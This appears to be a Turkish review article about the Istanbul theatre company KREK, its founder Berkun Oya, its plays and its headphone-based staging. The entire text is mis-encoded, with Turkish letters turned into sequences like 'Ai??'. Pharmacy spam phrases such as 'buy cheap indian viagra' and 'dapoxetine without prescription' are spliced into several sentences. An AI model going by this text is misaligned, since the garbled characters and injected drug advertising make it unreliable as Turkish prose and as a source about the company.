23 Ocak 2019, Çarşamba
SON HABERLER
Buradasınız: Anasayfa / Genel / KREK’in Kafa AyarAi??
KREK’in Kafa AyarAi??

KREK’in Kafa AyarAi??

A?lke tiyatrosunda yeni olana dair yapAi??lan kAi??sAi??r A?retim denemelerinde her zaman hem yerli hem de kaliteli iAYlerle karAYAi??laAYamAi??yoruz maalesef. BatAi??’dan ithal son model dramatik akAi??mlarla yara bere iAi??inde kendini gAi??stermeye Ai??alAi??AYan ‘genAi??’ tiyatrocular, yer yer sAi??rAi??tan yapAi??mlarla ve seyircisinden baAYAi??msAi??z, toplumda tabanAi?? olmayan marjinal oyunlarla gAi??steri dA?nyasAi??nda isim yapmaya, bir AYekilde kendilerini var etmeye Ai??alAi??AYadursunlar, “kayayAi?? delen incir” misali sadece kendi oyunlarAi??nAi?? sahneye koyan bir tiyatro grubu peyda oldu: KREK! 1999 yAi??lAi??nda yazar-oyuncu Berkun Oya ve oyuncu Ali Atay tarafAi??ndanAi??Ai??stanbul’da kurulan KREK Tiyatro TopluluAYu, 12 senedir iAi??imizden Ai??Ai??kan yerli Ai??ykA?leri yeni metotlarlaAi??ve seyircisini AYaAYkAi??na Ai??eviren bir A?slupla sahnelemeye Ai??alAi??AYAi??yor. Fakat KREK‘i anlatmadan Ai??nce birkaAi?? noktaya aAi??Ai??klAi??k getirelim…

Ai??Ai??ine dahil olmaktaki Ai??srarAi??mAi??zAi?? sA?rdA?rdA?kAi??e kAi??tA? bir fAi??kraya dAi??nA?AYen monarAYizmin yasAi??nAi?? tutan BatAi?? Avrupa’da, sanatAi??n her dalAi??nda olduAYu gibi tiyatroda da kendini gAi??steren yeni arayAi??AYlar, basit bir dAi??AYavurumdan Ai??te, kendini anlatma Ai??abasAi??nAi??n en sade AYekliyle vA?cut bulma halidir. Her bir dA?nya savaAYAi??ndan sonra yeni bir sanat akAi??mAi??nAi??n alAi??p baAYAi??nAi?? gittiAYi Avrupa, her tA?r siyasi/kA?ltA?rel/ekonomikAi??olayla deAYerlerini yeni baAYtan Ai??izen bir medeniyetler beAYiAYinden Ai??ok, “yaralarAi??mAi??zAi?? nasAi??l sararAi??z,Ai??kendimizi nasAi??l ifade ederiz, bu diyeti nasAi??l Ai??deriz?” sorularAi??nAi??n cevabAi??nAi??n arandAi??AYAi?? bir nevi “oyunAi??alanAi??“. BunlarAi?? yazAi??yorum Ai??A?nkA? Ai??rnek aldAi??AYAi??mAi??z BatAi?? sempatizanAi?? kuramcAi??larAi??mAi??zAi??n ve tiyatro patronlarAi??mAi??zAi??n tepeden inme Ai??lAi??A?tleriyle kendimizi ifade etmekte, bize bir kaAi?? beden bA?yA?k gelen sanatsal tavrAi??mAi??zAi?? saAYa sola saAi??makta oldukAi??a cAi??mert davranAi??yoruz. Toplumsal tabanda karAYAi??lAi??k bulamamAi??AY bir sorunun cevabAi??nAi?? tercA?me ettirip, bunu bu soruna yabancAi?? olan seyirciye yutturmaya Ai??alAi??AYAi??yoruz. Haliyle bu durumda ortaya komik, amaAi??sAi??z, ikinci elden Ai??evirilerle cahil mA?samereAi??denemeleri ortaya Ai??Ai??kAi??yor. 21. yA?zyAi??lda bu A?lkede izleyiciye ai???yeni/genAi??/Ai??ncA?/aykAi??rAi?? tiyatro yapAi??yoruzai??? maskesiyle yutturulmaya Ai??alAi??AYAi??lan durum bu. Tarihimiz boyunca yaAYamAi?? her tA?rlA? absA?rdlA?kle dolu olan yurdum insanAi??na absA?rdizmi anlatamamAi??AY, bunu kuramsallaAYtAi??rAi??p benimsetememiAYsek, ‘YA?zA?ne Tiyatro’yu hangi yA?zle yapabiliriz ki nihayetinde?

Belki de asAi??l soru AYu: modern dramanAi??n merkezinde tam da beslendiAYi alana karAYAi??lAi??k gelerek ortaya Ai??Ai??kan bAi??ylesi gA?Ai??lA? bir tiyatro anlayAi??AYAi??nAi??, kA?ltA?rel/sosyal/siyasi evrelerini bile neredeyse sek sekAi??atlayarak geAi??en bir A?lkede sAi??rAi??tmadan nasAi??l sahneye koyabiliriz? Othello z pack no prescription online. ‘yu ArabAi??n Ai??ntikamAi?? diye Ai??evirmenin altAi??nda yatan kA?ltA?rel kodu bile analiz etmeden, durup dA?AYA?nmeden gA?lA?p geAi??iyor, devrimAi??arifesinde Ai??ekhov’un yarattAi??AYAi?? karakterlerin verdiAYi varoluAY sancAi??sAi??nAi?? ‘kA?l altAi??ndaki kor‘ diyerek kesip atAi??yoruz…Ai??Tam da tiyatromuzun hal-i pA?r melA?li bAi??ylesine ortadayken, KREK ismi altAi??nda toplanan genAi?? bir ekip Ai??Ai??ktAi?? ortaya. Sadece kendi yazdAi??klarAi?? oyunlarAi?? oynayan, sokaAYAi??n nabzAi??nAi?? tutan, sAi??zde deAYil, Ai??zde baAYAi??msAi??z ve yenilikAi??i bir tiyatronun sAi??zcA?lA?AYA?nA? yapan bir ekip karAYAi??mAi??zdaki. Brechtian, Pinteresk ya da Beckettvari deAYil; KREK’variler, yani neyseler Ai??yleler. OkunduAYu gibi yazAi??lAi??AYAi?? da bundan. Beslendikleri alan sadece sokak ya da yaAYadAi??klarAi?? Ai??evre de deAYil A?stelik; biraz Tarantino havasAi??, biraz rock kafasAi?? ve biraz da oyun havasAi??. Melodrama bulaAYmaktan korkmadan, kliAYeye dA?AYmekten Ai??ekinmeden ve en Ai??nemlisi de eleAYtirilmekten gocunmadan, bu sahnede garip kaAi??ar demekten utanmadan Ai??Ai??kAi??yorlar seyircinin karAYAi??sAi??na. GeAi?? geldiAYi iAi??in salonun en arkasAi??ndaAi??bir kAi??AYeye atAi??lmAi??AYAi??ai???zavallAi??ai??? seyircisinin de oyuna dahil olup olan biteni duymasAi?? iAi??in oyuncusunu da baAYAi??rtmAi??yor A?stelikAi??KREK; sesi sahnede yalAi??tAi??p mikrofon kullanAi??yor ve seyirci oyunu kulaklAi??kla dinleyip karakterin kalp atAi??AYAi??nAi?? bile duyabiliyor. Bunu artistlik olsun diye de yapmAi??yor A?stelik, gerektiAYi iAi??in yapAi??yor, Ai??yle dA?AYA?ndA?AYA? iAi??in. Oyun alanAi??nAi?? geniAYletiyor, seyirciye laf sokarak yapAi??ldAi??AYAi?? sanAi??lan ‘etkileAYimli’Ai??tiyatronun ipliAYini pazara Ai??Ai??karAi??yor: o Ai??yle olmaz, bAi??yle olur diyor. “Belki seyirci bir oyunda klozetAi??kapaklarAi??nAi??n A?stA?nde oturacak belki bir baAYka oyunda merdivenlerde oturacak” diyecek kadar da cesur.

HazAi??r cevaplar Ai??aAYAi??nda yaAYadAi??AYAi??mAi??zAi??n farkAi??ndayAi??m. Google gibi kA?resel AYirketler hazAi??r sorulara pratikAi??cevaplar sunmakta, Wikipedia gibi kaynaklar bilgi ihtiyacAi??nAi?? suni yollarla karAYAi??lamakta usta. Peki ya insan? YaAYama dair olan merak, hangi dramatik yolla sahneye konulmalAi??? Ya da sahne ne kadarAi??gerekli? Ai??erAi??eve sahneler tiyatronun at gAi??zlA?klerine mi dAi??nA?AYA?yor? Bunlara Google bile cevapAi??veremez; arAi??yoruz, arayacaAYAi??z… Fakat kolaya kaAi??Ai??yoruz. Okyanus Ai??tesinde iyi olanAi??n her zaman mubah olduAYu yAi??nA?nde garip bir sanrAi??ya kapAi??lmAi??AY battAi??kAi??a batAi??yoruz. DA?nya bir oyun alanAi?? evet, ama sahne ciddi, sahnede oyun olmaz…

KurulduAYu gA?nden bugA?ne Berkun Oyaai??i??nAi??n yazdAi??AYAi?? oyunlarAi??, yine Oyaai??i??nAi??n rejisiyle sahneliyor KREK. Yazar-yAi??netmen Oya, Mimar Sinan A?niversitesi Devlet KonservatuarAi?? Tiyatro BAi??lA?mA? mezunu. 2000Ai??yAi??lAi??nda Ai??stanbul Komedram OyuncularAi?? adAi?? altAi??nda toplanan ekip, o dAi??nem farklAi?? sahnelerde pek Ai??okAi??oyunla seyirci karAYAi??sAi??na Ai??Ai??kmAi??AY. ArAYivin tozlu raflarAi??nAi?? karAi??AYtAi??rdAi??AYAi??mAi??zda, Eller YukarAi?? Bu Bir OyundurAi??gibi aynAi?? zamanda, aynAi?? mekA?nda ve aynAi?? oyuncular tarafAi??ndan ve art arda oynanan ilginAi?? kAi??sa oyun denemeleri gerAi??ekleAYtirmiAY. Ai??ok da derine inmeye gerek yok diyor Oya o zamanlar verdiAYi bir demeAi??te,Ai??ai???Adam Yiyen Adamlar isimli oyunum adam yiyen adamlarAi??, Adam Vuran Adamlar ise adam vuranAi??adamlarAi?? anlatAi??yorai???. Bu ne ile karAYAi?? karAYAi??ya olduAYumuzu az Ai??ok belli etmiAYtir sanAi??rAi??m. SAi??zA?nA? sakAi??nmayan, derdini anlatAi??rken tercA?meye yer bAi??rakmayan bir cA?ret karAYAi??mAi??zdaki. O dAi??nem aralarAi??ndaAi??Filler ve Ai??imenai??i??in de olduAYu birkaAi?? sinema filminde de oynuyor Oya. BaAYrol olmasa da, kA?Ai??A?k rollerde karAYAi??mAi??za Ai??Ai??kmasAi??, aslAi??nda tiyatroyla karAi??n doyurulamAi??yor oluAYunun da cevabAi??nAi?? iAi??inde barAi??ndAi??rAi??yor.

Ve nihayet ilk uzun oyunu Adamlar ile KREKai??i??in iAYaret fiAYeAYi ateAYleniyor. Oyun, bundan Ai??nce kA?Ai??A?k sahnelerde denemeler AYeklinde baAYlayan kAi??sa oyunlarAi??n bA?tA?nlA?klA? bir bileAYimi. Sahnede A?Ai?? adam, aksiyona bulaAYmadan sahneyi hareketle dolduruyor, diyor izleyenler. Ai??zlemediAYim iAi??in onlarAi??n yalancAi??sAi??yAi??m. Oyun hakkAi??nda o dAi??nem Ai??Ai??kan eleAYtirilerde kullanAi??lan ortak payda ise, tahmin edileceAYiAi??gibi absA?rd bir deneme ile karAYAi?? karAYAi??ya olduAYumuz gerAi??eAYi. Gelsin Beckettai??i??ler gitsin Adamovai??i??larai??i??Ai??Fakat haklarAi?? verilmiAY; ai???KREK, sahnelere yeni bir soluk getiren genAi?? bir ekipai??? diyor bA?yA?k birAi??gazetenin tiyatro eleAYtirmeni.

AynAi?? yAi??l KREK baAYka bir oyunla daha seyirci karAYAi??sAi??na Ai??Ai??kAi??yor: OPai??i??la ZOai??i??nun DramAi??. Alternatif tiyatroAi??seslerini buluAYturma amacAi??yla kurulan Maya Sahnesi KREKai??i??e kapAi??larAi??nAi?? aAi??Ai??yor ve seyirci OPai??i??la ZOai??i??nunAi??DramAi??ai??i??na ortak oluyor. Bir eleAYtirmen, ai???Bu ne biAi??im bir oyun bAi??yleai??? baAYlAi??AYAi??nAi?? uygun gAi??rmA?AY yazAi??sAi??na.Ai??Ai??vA?yor mu yeriyor mu pek de anlam veremediAYim yazAi??da yazar AYAi??yle diyor: ai???Oyun boyuncaAi?? buy cheap indian viagra. tiyatronun farklAi?? biAi??im ve tA?rlerini yan yana izliyoruz. absA?rd, epik, grotesk… Tam bir karmaAYa,Ai??ama kargaAYadan, karAi??AYAi??klAi??ktan Ai??ok uzakta. AbsA?rd olanla epik olanAi??, sessizlikle, gA?rA?ltA?yA?, boAYlukla,Ai??mA?ziAYi yan yana, arka arkaya, iAi?? iAi??e izlemek.ai??? HA?lA? bir sAi??fatla KREKai??i??i damgalanma yarAi??AYAi?? sA?rA?yor. Bir isim bulmalAi?? bu genAi??lere, ama ne?

Bir yAi??l sonra televizyonu da sepetine katAi??yor Berkun Oya. TRTai??i??de yayAi??nlanan Azapkadan Babam Ai??Ai??ktAi??Ai??isimli bir dizi yazAi??yor ve baAYrolA? de Mimar Sinanai??i??dan hocasAi?? MA?AYfik Kenterai??i??e veriyor. Bu diziyleAi??televizyona da adAi??m atan Oya, bir nevi kA?lt mertebesine ulaAYan Defakto gibi televizyon programlarAi??na da adeta kaygan bir zemin hazAi??rlAi??yor.

Bu dAi??nem Avni Dilligil Umut Veren Tiyatro Grubu Ai??dA?lA?ai??i??nA? de alan oyunla birlikte Oyaai??i??nAi??n, ileride 3. Tiyatro Tiyatro Dergisi Ai??dA?lleri ve 27. Ai??smet KA?ntay Tiyatro Ai??dA?lleriai??i??nde de “YAi??lAi??n Yerli OyunAi??YazarAi??” Ai??dA?llerini kucakladAi??AYAi??nAi?? yeri gelmiAYken ekleyelim.

2004, Ai??stanbul Devlet Tiyatrosu yapAi??mAi?? olan YangAi??n DuasAi??ai??i??nAi??n yAi??lAi??ydAi??. Yine Oyaai??i??nAi??n kaleme aldAi??AYAi?? oyun, 4 sene boyunca AYimdilerde can Ai??ekiAYen AKMai??i??nin Oda Tiyatrosuai??i??nu iAYgal etti. Ai??lk gAi??steriminiAi??Ai??KSV Tiyatro Festivali kapsamAi??nda GenAi?? Tiyatro baAYlAi??AYAi?? altAi??nda yapan YangAi??n DuasAi??, yaAYama meydan okumaya Ai??alAi??AYan A?Ai?? rahatsAi??z ruhun boAYluAYa karAi??AYma hayalleriyle sA?slA? bir fantazya olarak karAYAi??mAi??zaAi??Ai??Ai??ktAi??. Kendine has A?slubundan taviz vermeyen, seveni olduAYu kadar nefret edeni de bol oyunun, Ai??zellikle dekor ve Ai??AYAi??k tasarAi??mAi??ndaki zarafeti, A?lkA? Duru ve Ahmet UAYurluai??i??nun Ai??dA?llA? performanslarAi??Ai??kadar dikkat Ai??ekti o dAi??nem. Oyunda geAi??en “Gelecek kabul etmedi biziai??i?? Biz de geAi??miAYimizdeAi??yaAYAi??yoruz, tA?m asiller gibi” repliAYi ise, metne yedirilmiAY hAi??nzAi??r ipuAi??larAi??ndan sadece biri. EnAi??nihayetinde yazarAi?? Berkun Oyaai??i??ya gAi??reyse, ai???Ai??nA? ve arkasAi?? kapaklAi?? AYekilde yatan 52 sayfalAi??k bir metin.Ai??Tersinden aAi??arsak kullanAi??AYlAi?? bir defter? Ya da, her iki iAYi de gAi??recek olan baAYka bir AYey. Bir gAi??sterininAi??metni…ai???

Bir haber kanalAi??nAi??n reklamlarla bAi??lA?nen haber kuAYaklarAi?? arasAi??nda kendine yer bulan ve Oyaai??i??nAi??nAi??kitlelerce tanAi??nmasAi??nAi?? saAYlayan Defaktoai??i??nun doAYuAYu yine bu dAi??neme rastlar. 2004 yAi??lAi??nAi??n Ai??arAYamba akAYamlarAi??nAi?? kendine Ai??zgA? ciddiyetiyle kuAYatan programAi??n yarAi??m saat boyunca izleyicisine yaAYattAi??AYAi??Ai??duygu durumunu ifade etmek iAi??in RTA?Kai??i??A?n acil bir toplantAi?? dA?zenlediAYi bile rivayetler arasAi??ndadAi??r.Ai??Biri kadrolu dansAi??z mA? dedi?

2007ai??i??nin sonlarAi??na doAYru KREK Film Extra Super Tadadel buy online, dapoxetine without prescription. ai??i??in bir A?Ai??leme olarak dA?AYA?nA?len ilk sinema filmi Ai??yi SenelerAi??Londra vizyona girdi. KREKai??i??in demirbaAY oyuncularAi??ndan A?lkA? Duru ve Ali Atayai??i??Ai??n baAYrolleri paylaAYtAi??AYAi?? film, tesadA?flerle meydana gelen ve insanAi?? istemese de katlanmaya mecbur kaldAi??AYAi?? eylemlereAi??sA?rA?kleyen bir ai???kadercilikai??? oyununu perdeye taAYAi??dAi??. Oyaai??i??nAi??n sinemadaki ilk yAi??netmenlik denemesi olan film, senaryodaki ve yAi??netmenlik tekniAYindeki zaaflarAi??na raAYmen olgunluAYa ulaAYabilecek bir baAYarAi??nAi??n iyi niyetli bir Ai??ncA?lA? sayAi??labilir.

KAi??sa oyunlarAi?? saymazsak, KREKai??i??te 2011ai??i??e kadar olan dAi??nem ilk gAi??sterimini 2009ai??i??da yapan Bayrakai??i??laAi??geAi??ti. AynAi?? ai???bayrakai??? altAi??nda toplanan ve bir suAi??un altAi??nda ezilen bir ailenin parAi??alAi?? kurguyla yavaAY yavaAY dahil olduAYumuz hikayesi, Oyaai??i??nAi??n daha Ai??nceki oyunlarAi??nda da karAYAi??mAi??za Ai??Ai??kan benzer temalarAi??n daha toparlamAi??AY bir Ai??etelesini sahneye taAYAi??yor. Bir suAi??un aile meselesine dAi??nA?AYmesi, bir sevginin ihanetle kendini var etmesi ve bunlarAi??n sahteyle gerAi??eAYin iAi?? iAi??e geAi??tiAYi bir perspektiften sunuluAYuAi??A?zerine bir gA?zelleme Bayrak. Yeni dAi??nemde kendi sahnesinde sahnelenen, kadrosunda ve kurgusunda deAYiAYikliAYe gidilen oyunun topluluAYun tiyatro anlayAi??AYAi??nAi??n nadide parAi??alarAi??ndan birineAi??dAi??nA?AYtA?AYA?nA? sAi??ylemek gerek. KREKai??i??in bundan sonraki yapAi??mlarAi??nda bir referans noktasAi?? gAi??reviAi??gAi??rdA?AYA?nA? sAi??yleyebileceAYimiz Bayrak, Yeni TA?rk Tiyatrosuai??i??nun kodlarAi??nAi?? Ai??Ai??zmek iAi??in dikkatle incelenmesi ve etA?t edilmesi gereken Ai??aAYdaAY yapAi??mlarAi??n baAYAi??nda geliyor.

TopluluAYun santralistanbul bA?nyesindeki tarihi bir depoyu tiyatroya dAi??nA?AYtA?rerek kavuAYtuklarAi??Ai??salonlarAi??nda sahneledikleri son uzun oyunlarAi?? GA?zel Azeyler Bizim Tarafta, yazarAi?? Berkun OyaAi??tarafAi??ndan 2010′da prestijli International Royal Court Residency programAi?? dahilinde Royal CourtAi??Theatre‘da tamamlanmAi??AY. SoAYuk tanAi??tAi??m kitapAi??Ai??klarAi??na Ai??zgA? ruhsuz bir alAi??ntAi??yla Ai??zetlersek;Ai??ai???Korkaklar A?lkesinde sevmek suAi??, sevenler tutsak. Ai??ki farklAi?? Ai??ift, dAi??rt farklAi?? insan, tek bir kurban.Ai??Sevmek, ahlak, Ai??zgA?rlA?k ve bedelleri A?stA?ne sarsAi??cAi?? bir oyunai??? karAYAi??mAi??zdaki. Her AYeyden Ai??nce, kliAYeAi??tabirle sAi??ylersek ai???ezber bozanai??? bir tiyatro mevzubahis. Oyaai??i??nAi??n artAi??k kanAi??ksadAi??AYAi??mAi??z esnek bilinAi?? ayarAi?? daha tiyatroya adAi??m atmanAi??zla hissediliyor. Oyunun AYeffaf bir camAi??n arkasAi??nda oynandAi??AYAi??nAi?? ve seyircilerin tA?m olan bitene bir kulaklAi??k yardAi??mAi??yla tanAi??k olduAYunu duymayan kalmadAi?? galiba. DuymaAi??meselesine deAYinmiAYken, KREKai??i??in eleAYtirilere de neden olan sahne sesi tekniAYiyle kendi tiyatro anlayAi??AYAi??m arasAi??ndaki trajik baAYAi?? aAi??Ai??mlamak gerekai??i??

YazAi??mAi??n giriAYinde, bilinenler Ai??AYAi??AYAi??nda tiyatronun ne olabilirliAYine dair kiAYisel Ai??Ai??karsamalarda bulunmuAY ve Ai??erAi??eve sahnelerin de tAi??pkAi?? gA?len ve aAYlayan maskelerle simgeleAYen dramatik anlatAi??nAi??n basmakalAi??p nesnelerine dAi??nA?AYtA?AYA?nA? sAi??ylemiAYtim. Tiyatroya dair tA?m kurallarAi??n yAi??kAi??labileceAYine, teknik sAi??nAi??rlarAi??nAi??n deAYiAYebileceAYine, tiyatronun her sanat dalAi??yla etkileAYime girebileceAYine ve sahne anlayAi??AYAi??nAi??n yeni baAYtan tanAi??mlanabileceAYine, dramanAi??n Ai??zA?ne ihanet etmediAYi sA?rece, inanlardanAi??m.Ai??KREKai??i??in yeninin peAYindeki arayAi??AYAi??nAi?? da bu dA?zlemde deAYerlendiriyor ve topluluAYun her ne kadar kuramsal bir altyapAi??da olmasa da sergiledikleri duruAYu Ai??nemsiyorum. A?Ai?? tarafAi?? kapalAi?? Ai??talyan Sahnesiai??i??nin Ai??nA?ne yerleAYtirdikleri bir camla yalAi??tAi??lmAi??AY sahne sesinin, yA?ksek frekanslAi?? bir sinyale dAi??nA?AYerek bir kablosuz kulaklAi??k aracAi??lAi??AYAi??yla kulaklarAi??mAi??za ulaAYmasAi??nAi??n hiAi??bir dramatik yasayAi?? ihlalAi??ettiAYini de dA?AYA?nmA?yorum. ai???Sahnede gereksiz olanAi??n varlAi??AYAi??na katlanmanAi??n seyirci aAi??Ai??sAi??ndanAi??yarattAi??AYAi?? sAi??kAi??ntAi??ya ne demeli peki?ai??? AYeklinde dA?AYA?nebilirsiniz. Bunun cevabAi??nAi?? en iyi, sesini arka sAi??radaki seyirciye duyurmak iAi??in ses tellerini paralayan bir oyuncu verebilir belki. Sesin drama sanatAi??ndaki yerine dAi??nA?p bu duruma bir Ai??rnekle katkAi?? sunalAi??m: sinema sanatAi??nAi??n ilk bA?yA?k yAi??netmenlerinden RenAi?? Clair, ses tekniAYi araAi??larAi??nAi??n iAYlevsellikten uzak olduAYunu dA?AYA?nA?yordu. Ona gAi??re ses, iAi??inde barAi??ndAi??rdAi??AYAi?? anlam itibariyle gAi??rA?ntA?den baAYAi??msAi??zdAi??. GAi??rA?ntA?yle sesi baAYdaAYtAi??rmakAi??gereksiz bir uAYraAYAi?? ve hatta sinema sanatAi??nAi??n Ai??zA?ne ihanetti. Bu nedenle ai???GAi??rA?ntA?yle sese karAYAi?? Ai??Ai??kmaAi??manifestosu” kaleme alan yAi??netmenin bu asenkronize ses tasarAi??mAi??, Brechtien sinemacAi??lar tarafAi??ndan da bA?yA?k ilgi gAi??recekti. Sesli sinemanAi??n en bA?yA?k dA?AYmanlarAi??ndan Charlie Chaplinai??i??in sessizliAYinAi??gizemini Ai??ldA?rdA?AYA? gerekAi??esiyle karAYAi?? Ai??Ai??ktAi??AYAi?? ses hakkAi??nda ai???sinemayAi?? ayaAYa dA?AYA?rA?yorai??? demesiyle,Ai??Brechtai??i??in ai???BaAYAi??rmayAi??n, konuAYmaya Ai??nem verin; aAi??Ai??k seAi??ik, anlaAYAi??lAi??r biAi??imde konuAYun, insan gibi.Ai??Sahne dili dediAYimiz AYeyi ters yAi??nden almayAi??nai??? sAi??zleri arasAi??nda kurulan baAYda, en arka sAi??radakiAi??seyirciye ne duymak dA?AYA?yor acaba? Bunu genellikle arka sAi??ralarda oturan ya da geniAY salonlarda oyun izleyenler iAi??in deAYil, tiyatroda gereksiz olana kimin ya da neyin karar verdiAYini merak edenler iAi??in soruyorum? GerAi??ekliAYin dozunu sahtenin Ai??ekiciliAYiyle Ai??lAi??en bir yazar, sesin gA?cA?nA? tiyatrodan alarak seyircinin hizmetine sunuyor. Bu devrim niteliAYindeki yAi??ntem, oyuncunun bir kostA?m gibi taAYAi??dAi??AYAi?? sesini ortadan kaldAi??rAi??yor ve onu hayatAi??n ve doAYal olarak dramatik Ai??atAi??nAi??n merkezine bindiriyor. SonuAi?? olarak sahibinin sesi, seyircinin diline dAi??nA?AYA?p eriyorai??i??

Geleneksel tiyatro pratiAYini bir elbise gibi askAi??ya asAi??p eline kulaklAi??klarAi??nAi?? alan ve bir teknisyenin sadeceAi??ai???gri tuAYlaraai??? basAi??n komutuyla bilgilenen seyirciyi akabinde aAYkAi??n ve sevginin ortak ekseninde buluAYmuAY farklAi?? kayAi??p hayatlarAi??n sonu her dAi??nem deAYiAYmeyen malum maceralarAi?? karAYAi??lAi??yor. AlgAi??sAi?? kAi??t, Ai??evresi geniAY bir Ai??ocuk-adam ve onun sahte bir aAYkAi??n kollarAi??nda Ai??Ai??rpAi??nan kimliksiz bir kadAi??n olarak sevgilisi. YA?ksek perdeden kahkahalar atAi??lmAi??AY, en sulu AYakalara bilfiil alet olunmuAY, romanslar yaAYanmAi??AY, Ai??iAi??ekler alAi??nmAi??AY, kurlar yapAi??lmAi??AY, filmler izlenmiAY, koAi??anlar saklanmAi??AY. Ama yok, yA?rA?mA?yor. YA?rA?mediAYi gAi??rmezden gelindikAi??e sAi??kAi??cAi?? bir filme dAi??nA?AYen bu iliAYkinin biletleri satmAi??yor. Bitmeli. KadAi??n adamAi?? terk etmeli ve hayatAi??na devam etmeli. Modern zamanlara Ai??zgA? bir terk ediAY olmalAi?? bu;Ai??Ai??yle silahla-dayakla deAYil, kibar bir dille ve ai???insancaai???. En fazla sert kapanan kapAi??lar ve terk edenin ardAi??ndan edilen bA?yA?k kA?fA?rlerle. Modern iliAYkilerde aranan minimum terk edilme kriterlerine gAi??re,Ai??onaylAi??, sertifikalAi??, el deAYmemiAY olmalAi??. ai???AAYa dizileriai???yle uyutulan, medyaya yansAi??yan AYiddet sahneleriyle meAYrulaAYtAi??rAi??lan bir halkAi??n diliyle deAYil, hayatAi?? dAi??rt duvar arasAi??na sAi??kAi??AYmAi??AY, insan seli arasAi??nda kaynayAi??p giden ve aynAi?? evde yaAYadAi??klarAi??nAi??n farkAi??na o eve bir hAi??rsAi??zAi??n girmesiyle uyanan metropol insanAi??nAi??n sesiyle. Duydunuz iAYte; bu, kutuplaAYtAi??rAi??lmAi??AY, yabancAi??laAYtAi??rAi??lmAi??AY ya da moda deyimleAi??Ai??tekileAYtirilmiAY ai???canlAi??larai??? arasAi??nda yaAYanan bol ajitasyon yA?klA? bir karasevda deAYil. KadAi??nAi??n adamaAi??ai???Kendimizi kandAi??rmayalAi??m?ai??? derken, adamAi??n seyirciden gAi??zlerini kaAi??Ai??rarak kadAi??na sorduAYu ai???Ya kimiAi??kandAi??ralAi??m?ai??? sorusu gibi. Kananlar, aldananlar ve seyre dalanlar. Tabii bir de namus belasAi??na Ai??len bir garip A?AYAi??klar varai??i?? Sahi ya, onlar sadece televizyonda yaAYamAi??yor muydu?

Yazar-yAi??netmen Oya sokak aAYzAi??na, kelime oyunlarAi??na ve bilinAi?? akAi??AYAi??na hA?kim. Dramatik olaylarAi?? birbirine baAYlarken kullandAi??AYAi?? teknik taze ve ilgi Ai??ekici. Karakter yaratAi??mAi??nda oyuncularAi??nAi?? serbest bAi??raktAi??AYAi??nAi?? dA?AYA?nmekle birlikte, kendi yazdAi??AYAi?? metne ne kadar baAYlAi?? kaldAi??AYAi??nAi?? da merak etmiyor deAYilim. BeyazAi??n hA?kim olduAYu ve spot Ai??AYAi??AYAi??n kullanAi??lmadAi??AYAi?? sahne canlAi?? ve enerji yA?klA?. Zaten bir kA?pA? andAi??ran oyun alanAi??, sAi??nAi??rlarAi??nAi?? Ai??izmede, Ai??izdiAYi sAi??nAi??rlarAi?? ekonomik kullanmada baAYarAi??lAi??. Daha Ai??nceAi??Bayrakai??i??ta da gAi??rdA?AYA?mA?z minimalist tasarAi??m anlayAi??AYAi?? burada da sA?rdA?rA?lmA?AY. Ai??AYrenci evinden hallice bir sadelik, ferahlamaya fAi??rsat vermeyen bir basAi??klAi??kla dengelenmiAY. Oyunun bir bAi??lA?mA?nde evden Ai??Ai??kAi??p sokaAYa karAi??AYan ve bu sAi??rada boAY sahneyi izleyen seyirciye sadece sesleriyle sokaAYAi??n ritmini taAYAi??yan karakterler, bizleri odayAi?? dikizleyen yabancAi??lara dAi??nA?AYtA?rerek zeki bir yanAi??lmasa yaratAi??yor. Oyunun atmosferine girmede pek de sorun yaAYamayan seyirciyi, eAYer kulaklAi??k mevzusunu da sorunsuz atlamAi??AYsa bekleyen en bA?yA?k engel sanAi??rAi??m parazit sorunu. Yer yer cAi??zAi??ltAi??laAYan sesi duymakta zorlanabilir, kulaklAi??AYAi??n ayarlarAi??yla oynarken oyunu kaAi??Ai??rabilirsiniz. AyrAi??ca izlediAYim gAi??sterimdeAi??meydana gelen teknik aksaklAi??k gibi talihsiz durumlar, hem seyircinin dikkatinde hem de oyuncunun konsantrasyonunda ciddi bozulmalara neden olabiliyor. Mesela verilen 5 dakikalAi??k ara sonrasAi??nda geriden baAYlayan oyun iAi??inde unutulan sonraki bAi??lA?me ait bir nesne, oyuncular arasAi??nda saAi??maAi??diyaloglara, seyirciler arasAi??nda manasAi??z gA?lA?AYmelere neden oldu. KREKai??i??in, baAYlattAi??AYAi?? bu yeni tiyatro deneyiminde aAYAi??lmamasAi?? halinde sahnelemenin amacAi??na ulaAYmayacaAYAi?? aAi??Ai??k bu tA?r teknik sorunlarAi?? Ai??Ai??zmesinin AYart olduAYunu dA?AYA?nA?yorum.

Ai??ocuklukla olgunluk arasAi??nda bocalayan rollerle tanAi??dAi??AYAi??mAi??z ve bunu en iyi women viagra shop. Ai??oAYunluk filmindeAi??gAi??steren Bartu KA?Ai??A?kAi??aAYlayan, oyunda canlandAi??rdAi??AYAi?? Orhan karakteriyle yine bildiAYini okumaya devam ediyor. Oyaai??i??nAi??n yakAi??n arkadaAYAi?? da olan KA?Ai??A?kAi??aAYlayan, sanki kendisi iAi??in yazAi??lmAi??AY bu rolde sahne gereAYi ara ara parladAi??AYAi?? anlar dAi??AYAi??nda yalAi??n bir performans sergiliyor. Sevgilisi rolA?nde izlediAYimiz TA?lin Ai??zen iAi??in de, eAYer sahnede olmadAi??AYAi?? anlarda sesiyle eAYlik ettiAYi bAi??lA?mleri saymazsak farklAi?? bir AYeyler sAi??ylemek imkA?nsAi??z. Ozan Ai??elik ise, kAi??sa rolA?ne raAYmen seyirciyi germeyi baAYarAi??yor,Ai??oyundaki tek gAi??revi de bu zaten. GA?zel Azeyler Bizim Taraftaai??i??nAi??n performansAi??yla Ai??ne Ai??Ai??kan karakteriAi??Ai??ykA? Karayel. Karayel, seyircinin ve de Orhanai??i??Ai??n sinirlerini bozacak denli A?rkek, aAYlak ve de A?AYAi??k AyAYeAi??rolA?yle melodramdan trajediye, oradan drama ve komediye serbest bir geAi??iAY yapAi??yor. Titreyen sesini her daim tonunda tutmaya Ai??alAi??AYarak attAi??AYAi?? ve gAi??zyaAYlarAi??nAi??n aktAi??AYAi?? genzinde hapsolmuAY kA?Ai??A?k bir kAi??z Ai??ocuAYunun serzeniAYini andAi??ran son tiradAi??, oyunun neyi var neyi yok ortaya sA?rdA?AYA? tA?m temeli tek baAYAi??na sAi??rtlAi??yor.

